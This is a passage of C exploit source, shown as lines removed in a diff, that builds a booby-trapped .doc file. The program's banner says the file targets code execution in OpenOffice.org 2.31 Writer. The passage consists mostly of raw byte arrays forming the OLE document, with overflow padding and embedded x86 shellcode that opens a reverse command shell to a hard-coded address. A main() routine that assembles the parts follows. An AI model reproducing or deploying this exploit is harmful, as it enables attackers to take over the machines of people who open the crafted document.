-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00" -"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00" -"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00" -"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00" -"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00" -"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00" -"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00" -"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00" -"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00" -"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00" -"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00" -"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00" -"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00" -"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00" -"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00" -"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00" -"\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00" 
-"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00" -"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00" -"\x4d\x00\x00\x00\x4e\x00\x00\x00\x4f\x00\x00\x00\x50\x00\x00\x00" -"\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00" -"\x55\x00\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00" -"\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00\x5c\x00\x00\x00" -"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00" -"\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00" -"\x65\x00\x00\x00\x66\x00\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00" -"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00" -"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00" -"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00" -"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00" -"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00" -"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00" -"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00" -"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00" -"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00" -"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00" -"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff" -"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" -"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00" -"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00" -"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00" -"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00" -"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00" -"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00" -"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00" -"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00" 
-"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00" -"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00" -"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00" -"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00" -"\x94\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xd5\x00\x00\x00\xd6\x00\x00\x00\xd7\x00\x00\x00\xd8\x00\x00\x00" -"\xd9\x00\x00\x00\xda\x00\x00\x00\xdb\x00\x00\x00\xfe\xff\xff\xff" -"\xfd\xff\xff\xff\xfd\xff\xff\xff\xdf\x00\x00\x00\xfe\xff\xff\xff" -"\xfe\xff\xff\xff\xe2\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00" -"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x16\x00\x05\x6d\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00" -"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x53\x3f\x53" -"\x31\x1d\xc6\x01\xe1\x00\x00\x00\x40\x02\x00\x00\x00\x00\x00\x00" -"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00" -"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00" -"\x57\x6f\x6f\x6f\x72\x72\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00" -"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\x00\x00\x00\x00\x00" -"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" -"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" -"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00" 
-"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00" -"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" -"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" -"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xf0" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xd4\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00" -"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -; -char file_part9[]= -"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00" -"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00" -"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x01\x41\x41\x41\x41\xfe\x45\x93\x60\x43\x43\x43\x43\xa8\xef\xff" -"\xff\xbd\x5c\x91\x60\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" -"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" -"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" -"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" -"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" -"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" -"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" -"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" -"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" -"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68" -"\xc0\xa8\x00\xc6\x66\x68\x7a\x51\x66\x53\x89\xe1\x95\x68\xec\xf9" -"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" -"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3" -"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" -"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" -"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6" -"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6" -"\xff\x77\xfc\xff\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0\x44" -"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" -"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" -"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" -"\x00\x00\x00\x14\x00\x00\x00\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74" -"\x20\x57\x6f\x72\x64\x20\x31\x30\x2e\x30\x00\x40\x00\x00\x00\x00" -"\x8c\x86\x47\x00\x00\x00\x00\x40\x00\x00\x00\x00\x46\x4c\x26\x97" -"\xea\xc3\x01\x40\x00\x00\x00\x00\xea\xff\x56\x9f\x1b\xc6\x01\x40" 
-"\x00\x00\x00\x00\xbe\xae\xfd\x65\x1c\xc6\x01\x03\x00\x00\x00\x00"
-;
-
-
-
-int main(int argc, char *argv[]) {
- FILE* file;
- char evilbuff[200000];
- int offset=0;
-
- printf("[+] Open Office.org 2.31 swriter code execution\n");
- printf("[+] Marsupilamipowa@hotmail.fr\n");
- if (argc!=2) {
- printf("[+] Usage: %s file.doc \n",argv[0]);
- return 0;
- }
-
- memcpy(evilbuff+offset,file_part0,sizeof(file_part0)-1);
- offset+=sizeof(file_part0)-1;
- memcpy(evilbuff+offset,file_part1,sizeof(file_part1)-1);
- offset+=sizeof(file_part1)-1;
- memcpy(evilbuff+offset,file_part2,sizeof(file_part2)-1);
- offset+=sizeof(file_part2)-1;
- memcpy(evilbuff+offset,file_part3,sizeof(file_part3)-1);
- offset+=sizeof(file_part3)-1;
- memcpy(evilbuff+offset,file_part4,sizeof(file_part4)-1);
- offset+=sizeof(file_part4)-1;
- memcpy(evilbuff+offset,file_part5,sizeof(file_part5)-1);
- offset+=sizeof(file_part5)-1;
- memcpy(evilbuff+offset,file_part6,sizeof(file_part6)-1);
- offset+=sizeof(file_part6)-1;
